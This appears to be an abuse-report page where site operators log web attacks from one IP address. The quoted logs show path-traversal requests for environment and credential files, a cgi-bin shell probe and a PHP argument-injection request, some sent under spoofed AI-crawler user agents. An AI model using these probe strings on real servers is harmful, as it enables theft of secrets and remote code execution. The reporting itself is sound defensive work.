๐ฌ๐ง
openstrike.co.uk
2026-10-09 05:14:42
(2 days ago)
321 attacks on env grabbing URLs (type 2), password/key grabbing URLs, env grabbing URLs, shell prob ...
show more
321 attacks on env grabbing URLs (type 2), password/key grabbing URLs, env grabbing URLs, shell probes, directory traversals, PHP URLs, config grabbing URLs (type 2), VC URLs:
GET /public/plugins/alertlist/../../../../../../../../proc/self/environ HTTP/1.1
GET /.git-credentials HTTP/1.1
GET /.env.js HTTP/1.1
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
GET /..%2f..%2f.env HTTP/1.1
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1
GET /app-config.json HTTP/1.1
GET /.git/config HTTP/1.1
show less
Hacking
Web App Attack
๐ฉ๐ช
stinpriza
2026-10-09 02:57:03
(2 days ago)
common Web Exploits being scanned
Web App Attack
๐ฉ๐ช
CrownSync.uk
2026-10-09 02:56:36
(2 days ago)
Automated detection: repeated HTTP 4xx scan-burst against a public web endpoint.
Port Scan
Web App Attack
๐ง๐ช
voormedia
2026-10-09 02:12:03
(2 days ago)
Accessed trap at '/.env'
Web App Attack
๐ต๐ฑ
sigurg
2026-10-09 02:09:21
(2 days ago)
This IP was detected by CrowdSec triggering crowdsecurity/http-path-traversal-probing
Web App Attack
Hacking
๐บ๐ธ
TPI-Abuse
2026-10-09 01:46:51
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 35.185.7.209 (209.7.185.35.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 35.185.7.209 (209.7.185.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Oct 08 21:46:46.531796 2026] [security2:error] [pid 16656:tid 16656] [client 35.185.7.209:33674] ModSecurity: Access denied with code 403 (phase 1). Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "zenventures.co.uk"] [uri "/.htpasswd"] [unique_id "ashHhsjIS7hrRNH3enuhGwAAACM"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ณ๐ฑ
wolfemium
2026-10-09 01:38:40
(2 days ago)
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "GET /pi.php HTTP/2.0" 404 107 "-" "Mozilla/5.0 AppleW ...
show more
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "GET /pi.php HTTP/2.0" 404 107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Claude-SearchBot/1.0; [email protected] )"
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "GET /phpinfo.php HTTP/2.0" 404 107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; PerplexityBot/1.0; +https://perplexity.ai/perplexitybot)"
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "GET /i.php HTTP/2.0" 404 107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; GPTBot/1.4; +https://openai.com/gptbot"
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "GET /app_dev.php HTTP/2.0" 404 107 "-" "Mozilla/5.0 (compatible; YouBot/1.0; +https://you.com/bot)"
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "GET /test.php HTTP/2.0" 404 107 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15 (Applebot/0.1)"
35.185.7.209 - - [09/Oct/2026:04:38:40 +0300] "G
...
show less
DDoS Attack
๐ฉ๐ช
ghostwarriors
2026-10-09 00:50:07
(2 days ago)
Attempts against non-existent wp-login
Brute-Force
Web App Attack
๐ฌ๐ง
NotCool
2026-10-09 00:44:42
(2 days ago)
(CRAWLDELAY) Generic Bot Crawl-delay Violation 35.185.7.209 (US/United States/209.7.185.35.bc.google ...
show more
(CRAWLDELAY) Generic Bot Crawl-delay Violation 35.185.7.209 (US/United States/209.7.185.35.bc.googleusercontent.com): 50 in the last 3600 secs
show less
Bad Web Bot
Anonymous
2026-10-09 00:43:11
(2 days ago)
[Fri Oct 09 01:43:10.213779 2026] [proxy_fcgi:error] [pid 5809:tid 5829] [remote 35.185.7.209:44272] ...
show more
[Fri Oct 09 01:43:10.213779 2026] [proxy_fcgi:error] [pid 5809:tid 5829] [remote 35.185.7.209:44272] AH01071: Got error 'Primary script unknown'
...
show less
Brute-Force
๐ฌ๐ง
bensmithurst
2026-10-09 00:36:58
(2 days ago)
35.185.7.209 - - [09/Oct/2026:00:36:54 +0000] "GET /public/plugins/text/../../../../../../../../proc ...
show more
35.185.7.209 - - [09/Oct/2026:00:36:54 +0000] "GET /public/plugins/text/../../../../../../../../proc/self/environ HTTP/1.1" 400 150 "-" "-"
35.185.7.209 - - [09/Oct/2026:00:36:56 +0000] "GET /@fs/..%2f..%2f..%2f..%2f..%2fproc/self/environ HTTP/1.1" 400 150 "-" "-"
35.185.7.209 - - [09/Oct/2026:00:36:56 +0000] "GET /@fs/..%2f..%2f..%2f..%2f..%2froot/.env HTTP/1.1" 400 150 "-" "-"
35.185.7.209 - - [09/Oct/2026:00:36:58 +0000] "GET /..%2f.env HTTP/1.1" 400 150 "-" "-"
35.185.7.209 - - [09/Oct/2026:00:36:58 +0000] "GET /%2e%2e/.env HTTP/1.1" 400 150 "-" "-"
... [host=LAN***]
show less
Web App Attack
๐ซ๐ฎ
KTSTechnology
2026-10-09 00:33:27
(2 days ago)
Web vulnerability scanning detected by our ISP firewall
Web App Attack
๐ฉ๐ช
yitzhaq
2026-10-09 00:32:18
(2 days ago)
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/var/task/.env?raw?? HTTP/2.0" 404 321 "-" "M ...
show more
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/var/task/.env?raw?? HTTP/2.0" 404 321 "-" "Mozilla/5.0 (compatible; Hunyuan/1.0; +https://hunyuan.tencent.com/)"
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/home/ec2-user/.aws/credentials?raw?? HTTP/2.0" 404 298 "-" "DuckAssistBot/1.1 (https://duckduckgo.com/duckassistbot)"
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/proc/self/cwd/.env?raw?? HTTP/2.0" 403 302 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexitybot)"
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/.env?raw&url?? HTTP/2.0" 403 302 "-" "Mozilla/5.0 (compatible; Qwenbot/1.0; +https://qwen.alibaba.com/)"
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/.env?import&?raw?? HTTP/2.0" 403 302 "-" "Mozilla/5.0 (compatible; Qwenbot/1.0; +https://qwen.alibaba.com/)"
35.185.7.209 - - [09/Oct/2026:02:32:16 +0200] "GET /@fs/.env?url&raw?? HTTP/2.0" 403 302 "-" "Mozilla/5.
show less
Web App Attack
Hacking
๐ฉ๐ช
sigurg
2026-10-09 00:31:56
(2 days ago)
This IP was detected by CrowdSec triggering crowdsecurity/http-probing
Web App Attack
Hacking
๐ฉ๐ช
hidemail.app
2026-10-09 00:31:19
(2 days ago)
Automated scan for exposed config/secret files and known web exploits (e.g. /.env, RCE probes); auto ...
show more
Automated scan for exposed config/secret files and known web exploits (e.g. /.env, RCE probes); auto-banned by fail2ban.
show less
Web App Attack
Hacking